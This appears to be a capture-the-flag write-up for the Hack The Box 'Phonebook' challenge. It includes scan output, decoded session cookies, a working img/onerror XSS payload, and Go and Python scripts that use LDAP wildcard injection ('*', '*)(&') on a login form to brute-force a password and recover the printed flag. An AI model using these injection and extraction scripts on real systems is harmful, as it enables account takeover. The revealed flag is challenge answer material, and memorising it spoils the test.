Phonebook

$ nikto -h http://46.101.91.21:31893
+ Server: No banner retrieved
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: /login
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ 7917 requests: 0 error(s) and 3 item(s) reported on remote host
$ dirb http://46.101.91.21:31893
---- Scanning URL: http://46.101.91.21:31893/ ----
+ http://46.101.91.21:31893/login (CODE:200|SIZE:2214) 

http://206.189.121.131:30730/login?message=Authentication%20failed
PHPSESSID
PHPSESSID:"Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoxNToiL3d3dy9pbmRleC5odG1sIjt9"
O:9:"PageModel":1:{s:4:"file";s:15:"/www/index.html";}

session:".eJyrVsrMSy9KTclMzStRsqpWUkhSslJKNqowjcyNMojMczKJCrS1VarVUcpNTSwuLUrNBaorhiv0D86v9E0HKagFAG5cF4c.YJVejA.yvsXnGDjmB808wzRx-lK2iSNg1E"
{"ingredient":{" b":"c2x5YmZ0YnB4ZQ=="},"measurements":{" b":"OSoyMg=="}}
slybftbpxe	9*22

mysession:"MTYyMDU2NjMzM3xEdi1CQkFFQ180SUFBUkFCRUFBQUpfLUNBQUVHYzNSeWFXNW5EQW9BQ0dGMWRHaDFjMlZ5Qm5OMGNtbHVad3dIQUFWeVpXVnpaUT09fEY-6tkbg4z2_OV-z2-DXx31sGRRre145G1SD8SdkHHI"
1620566333|Dv-BBAEC_4IAARABEAAAJ_-CAAEGc3RyaW5nDAoACGF1dGh1c2VyBnN0cmluZwwHAAVyZWVzZQ==|F>êÙ...öüå~Ïo._.õ°dQ.íxämR.Ä..qÈ

?message=<script>alert()</script>  does not work (the page inserts the value with innerHTML, and script elements added through innerHTML are not executed)
http://138.68.182.108:31629/login?message=%3Cscript%3Ealert()%3C/script%3E
?message=<img src=x onerror=alert(1) />  works
http://138.68.182.108:31629/login?message=%3Cimg%20src=x%20onerror=alert(1)%20/%3E

<script>
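  // Show the optional ?message= query parameter inside the #message element.
  const queryString = window.location.search;
  if (queryString) {
    const urlParams = new URLSearchParams(queryString);
    const message = urlParams.get('message');
    if (message) {
      const box = document.getElementById("message");
      // textContent renders the parameter as plain text. The original used
      // innerHTML, which parses the query value as markup -- that is the DOM
      // XSS sink exercised by the img/onerror payload above.
      box.textContent = message;
      box.style.visibility = "visible";
    }
  }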
</script>

$ go run gocheck.go http://138.68.182.108:31629/login
\ => 500 => http://134.209.25.183:32562/login
) => 500 => http://134.209.25.183:32562/login
* => 200 => http://134.209.25.183:32562/login
Here is gocheck.go (the listing begins at its import block; the `package main` line is not shown):
import (
    "fmt"
    "net/http"
    "net/url"
    "os"
    "sync"
)

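// makeReq submits one login attempt in which both the username and the
// password are the single character with code point ascii, then prints that
// character, the response status code and the final request URL (the URL
// after any redirects). It is meant to run as a goroutine and signals wg
// when it is done.
//
// On a transport error the error is printed and the function returns; the
// original dereferenced the nil response in that case.
func makeReq(URL string, ascii int, wg *sync.WaitGroup) {
    defer wg.Done()
    // string(rune(...)) is the explicit int-to-character conversion;
    // string(int) is flagged by go vet.
    payload := string(rune(ascii))
    res, err := http.PostForm(URL, url.Values{
        "username": {payload},
        "password": {payload},
    })
    if err != nil {
        fmt.Println(err)
        return
    }
    defer res.Body.Close()
    fmt.Printf("%s => %d => %s\n", payload, res.StatusCode, res.Request.URL)
}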

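// main takes exactly one URL on the command line and, for every code point
// from 32 to 126, starts a concurrent login attempt that uses that character
// as both username and password, then waits for all attempts to finish. The
// per-character status/URL lines it prints are what the sample run above
// shows.
func main() {
    args := os.Args[1:]
    if len(args) != 1 {
        fmt.Println("ERR: one URL at a time can be passed.")
        os.Exit(1) // usage error: exit non-zero
    }
    URL := args[0]
    var wg sync.WaitGroup
    for i := 32; i <= 126; i++ {
        // Add before starting the goroutine so Done cannot run before the
        // counter has been incremented.
        wg.Add(1)
        go makeReq(URL, i, &wg)
    }
    wg.Wait()
}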

Here is the Go code that finds the flag, phonebook.go:
package main

import (
    "fmt"
    "net/http"
    "net/url"
    "os"
)

// retData is the part of a login response that fuzz inspects: the HTTP status
// code and the URL the request ended on after any redirects. Fields are
// filled positionally by makeReq, so their order matters.
type retData struct {
    StatusCode int
    redirURL   string // res.Request.URL rendered as a string
}

//lookup list generator
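// genLookup returns the characters with code points n1 through n2 inclusive,
// one per element, in ascending order. It returns nil when n2 < n1.
func genLookup(n1, n2 int) []string {
    if n2 < n1 {
        return nil
    }
    lookup := make([]string, 0, n2-n1+1)
    for i := n1; i <= n2; i++ {
        // string(rune(i)) is the explicit character conversion; string(int)
        // is flagged by go vet.
        lookup = append(lookup, string(rune(i)))
    }
    return lookup
}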

//request maker
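// makeReq posts one login attempt for the fixed username "Reese" with the
// password tmp followed by "*" (in the gocheck run above, "*" is the
// character that returned 200) and returns the status code and the final
// request URL. URL must be the login endpoint.
//
// A transport error is reported on stdout and terminates the program with a
// non-zero exit status; the response body is always closed.
func makeReq(URL, tmp string) retData {
    const uname = "Reese"
    pass := tmp + "*"
    res, err := http.PostForm(URL, url.Values{
        "username": {uname},
        "password": {pass},
    })
    if err != nil {
        fmt.Println("ERR:", err)
        os.Exit(1) // a failed request leaves nothing to report
    }
    defer res.Body.Close()
    return retData{res.StatusCode, res.Request.URL.String()}
}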

// fuzz extends *payload one character at a time. For the current prefix it
// tries each lookup character in order; a candidate is accepted when the
// login response is 200 and the final request URL equals URL (no redirect),
// after which the search restarts from the first lookup character. A
// rejected candidate advances to the next character, and once every
// character has been rejected for the current prefix the function returns
// with the longest accepted prefix left in *payload. Every candidate is
// printed after it is tried.
//
// NOTE(review): a match at the last lookup index does not restart from
// index 0; the same character is retried, and if it is then rejected the
// loop ends. Confirm this is intended.
func fuzz(URL string, payload *string, lookup []string) {
    last := len(lookup) - 1
    for idx := 0; idx <= last; {
        candidate := *payload + lookup[idx]
        resp := makeReq(URL, candidate)
        accepted := resp.StatusCode == 200 && resp.redirURL == URL
        switch {
        case accepted && idx != last:
            *payload = candidate
            idx = 0
        case accepted:
            *payload = candidate
        default:
            idx++
        }
        fmt.Println(candidate)
    }
}

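// main reads the login URL from the first command-line argument, builds the
// lookup alphabet from code points 48 ('0') through 126 ('~'), runs fuzz
// from the empty prefix and prints the recovered value.
func main() {
    args := os.Args[1:]
    if len(args) == 0 {
        fmt.Println("Invalid Input")
        os.Exit(1) // usage error: exit non-zero
    }
    URL := args[0]
    var payload string
    lookup := genLookup(48, 126) // '0' .. '~'
    fmt.Println(lookup)
    fmt.Println("starting...")
    fuzz(URL, &payload, lookup)
    fmt.Println(payload)
}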

$ go run phonebook.go http://138.68.182.108:31629/login
HTB{d1rectory_h4xx0r_is_k00l}

Python version, phonebook.py:
#!/usr/bin/env python3

# imports
import requests
import os
import sys

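# Exactly one argument: the login URL to probe. The module-level names set here
# (target, ppgot, psgot, input_data and the four baseline responses) are read by
# user() and passwd() below.
if len(sys.argv) == 2:
    target = sys.argv[1]  # the url/target
    ppgot = ''  # successfully recovered username characters
    psgot = ''  # successfully recovered password characters
else:
    print("-------------------------- ERROR FOUND -----------------------")
    # a space separates the script name from the example URL; a usage error
    # exits non-zero
    print("Usage: " + str(sys.argv[0]) + " http://url:port/login")
    sys.exit(1)

# characters tried at each position
input_data = ["a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z","A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z","#","$","%","@","!","0","1","2","3","4","5","6","7","8","9","{","}","[","]","_","&","^"," "]
# baseline response bodies: user()/passwd() compare each attempt against the
# fail_* text; the success_* values are passed through but never compared
success_user = requests.post(target, data={'username': '*', 'password': "*"}).text
fail_user = requests.post(target, data={'username': "a", 'password': "a"}).text

success_psswd = requests.post(target, data={'username': ppgot, 'password': "*"}).text
fail_psswd = requests.post(target, data={'username': "a", 'password': "a"}).text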

def user(input_data, ppgot, success_user, fail_user):
    """Recover the username one character at a time.

    For each candidate character c, post ppgot + c + '*' as the username
    (with '*' as the password) to the module-level target and compare the
    response body with fail_user. A differing body counts as a hit: the
    screen is cleared, the extended prefix is printed, and the search
    recurses with the longer prefix; when that recursion returns, the
    process exits. If no character hits, the prefix is complete and
    passwd() is started with the module-level psgot/success_psswd/fail_psswd.
    success_user is accepted but never compared.
    """
    for c in input_data:
        extended = ppgot + c
        body = requests.post(target, data={'username': extended + '*', 'password': '*'}).text
        if body == fail_user:
            os.system("clear")
            print("Decoding: " + str(ppgot) + str(c))
            continue
        os.system('clear')
        print('DECODED: ' + extended)
        user(input_data, extended, success_user, fail_user)
        exit()

    print("Completed, user: ", ppgot)
    passwd(input_data, ppgot, psgot, success_psswd, fail_psswd)

def passwd(input_data, ppgot, psgot, success_psswd, fail_psswd):
    """Recover the password one character at a time for the known username ppgot.

    Each candidate c is posted as psgot + c + "*" against the module-level
    target and the body compared with fail_psswd. A differing body is a hit:
    the screen is cleared, the username and the extended prefix are printed,
    and the search recurses with the longer prefix; when that recursion
    returns the process exits. When no candidate hits, the final
    username/password pair is printed. success_psswd is accepted but never
    compared.
    """
    for c in input_data:
        attempt = psgot + c + "*"
        body = requests.post(target, data={'username': ppgot, 'password': attempt}).text
        if body == fail_psswd:
            os.system("clear")
            print("Completed, user: ", ppgot)
            print("Decoding: " + str(psgot) + str(c))
            continue
        os.system("clear")
        print("Completed, user: ", ppgot)
        print("DECODED: " + psgot + c)
        passwd(input_data, ppgot, psgot + c, success_psswd, fail_psswd)
        exit()
    print("Completed User: ", ppgot, " Password ", psgot)


# entry point: start from the empty username prefix set above; user() hands
# over to passwd() once the username is complete
user(input_data, ppgot, success_user, fail_user)

Another Python script, simple.py:
import requests
import string

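# login endpoint probed by every request below (the hard-coded target of this
# write-up)
LOGIN_URL = 'http://206.189.121.131:30730/login'

# candidate characters: letters, digits, '_' and the closing '}'
passlist = list(string.ascii_lowercase) + list(string.ascii_uppercase) + ['0','1','2','3','4','5','6','7','8','9','_','}']

payload = 'HTB{'

# Extend the known prefix by one character per pass. The suffix '*)(&' is kept
# unchanged from the original script; the trailing '*' appears to act as a
# wildcard (see the gocheck run earlier on the page). The original looped
# forever (`while 1`); stop once the closing '}' has been accepted.
while not payload.endswith('}'):
    for char in passlist:
        candidate = payload + char + '*)(&'
        resp = requests.post(LOGIN_URL, data={'username': 'Reese', 'password': candidate})
        if 'success' in resp.text:
            payload += char
        print(payload)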
